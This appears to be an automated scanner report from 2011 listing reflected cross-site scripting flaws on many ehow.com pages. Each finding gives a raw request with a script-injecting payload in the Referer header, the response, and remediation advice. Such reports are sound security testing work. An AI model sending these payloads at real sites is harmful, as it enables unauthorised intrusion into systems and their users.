Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /members.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=fd0e2</script><script>alert(1)</script>e6d76aa30d4
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:44 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46009
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8df1a</script><script>alert(1)</script>79b522071ca was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mental-health/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=8df1a</script><script>alert(1)</script>79b522071ca
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:03 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 70558
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Mental Health - How To Information | eHow.com</ti ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df132</script><script>alert(1)</script>95642539c8a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /music/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=df132</script><script>alert(1)</script>95642539c8a
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:05 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 70752
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Music - How To Information | eHow.com</title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a8e2</script><script>alert(1)</script>ac0dd484a7c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /parenting/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=9a8e2</script><script>alert(1)</script>ac0dd484a7c
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:04 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71224
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Parenting - How To Information | eHow.com</title> ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 451e2</script><script>alert(1)</script>fe7844aacb6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=451e2</script><script>alert(1)</script>fe7844aacb6
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:05 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72539
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Personal Finance - How To Information | eHow.com< ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9090e</script><script>alert(1)</script>f31899da430 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pets-and-animals/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=9090e</script><script>alert(1)</script>f31899da430
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:07 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73469
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Pets & Animals - How To Information | eHow.com</t ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66406</script><script>alert(1)</script>01977d190a7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /photos/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=66406</script><script>alert(1)</script>01977d190a7
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:17:15 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 69570
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 353c9</script><script>alert(1)</script>9a8f3a3d37b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /plant-care/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=353c9</script><script>alert(1)</script>9a8f3a3d37b
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:07 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 70437
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Plant Care - How To Information | eHow.com</title ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5840</script><script>alert(1)</script>c6c90bc3237 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /plants/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=a5840</script><script>alert(1)</script>c6c90bc3237
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:26 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 70812
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Plants - How To Information | eHow.com</title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0263</script><script>alert(1)</script>c17e4ec4831 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy.aspx HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=c0263</script><script>alert(1)</script>c17e4ec4831
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:57 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 49157
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8838a</script><script>alert(1)</script>04cbc86da1d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /real-estate-and-investment/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=8838a</script><script>alert(1)</script>04cbc86da1d
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:25 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71175
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Real Estate & Investment - How To Information | e ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75b27</script><script>alert(1)</script>c1855e6bba5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /recipes/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=75b27</script><script>alert(1)</script>c1855e6bba5
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:26 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72811
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Recipes - How To Information | eHow.com</title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88cc7</script><script>alert(1)</script>f36c82459a4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /recreational-activities/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=88cc7</script><script>alert(1)</script>f36c82459a4
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:26 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 70635
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Recreational Activities - How To Information | eH ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c8f9</script><script>alert(1)</script>5616881ca9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /relationships-and-family/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=6c8f9</script><script>alert(1)</script>5616881ca9
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:25 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 70783
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Relationships & Family - How To Information | eHo ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4da53</script><script>alert(1)</script>03f82fa2ae7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search.aspx HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=4da53</script><script>alert(1)</script>03f82fa2ae7
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:22 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: UserView=List; expires=Thu, 02-Feb-2012 15:15:22 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 30878
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e62b1</script><script>alert(1)</script>18a9920f7ad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /share.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=e62b1</script><script>alert(1)</script>18a9920f7ad
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:22 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 25999
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Share, Comment, Show & Tell, Write | eHow.com ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 420a6</script><script>alert(1)</script>dd06843fc54 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /site-map.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=420a6</script><script>alert(1)</script>dd06843fc54
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:49 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 25596
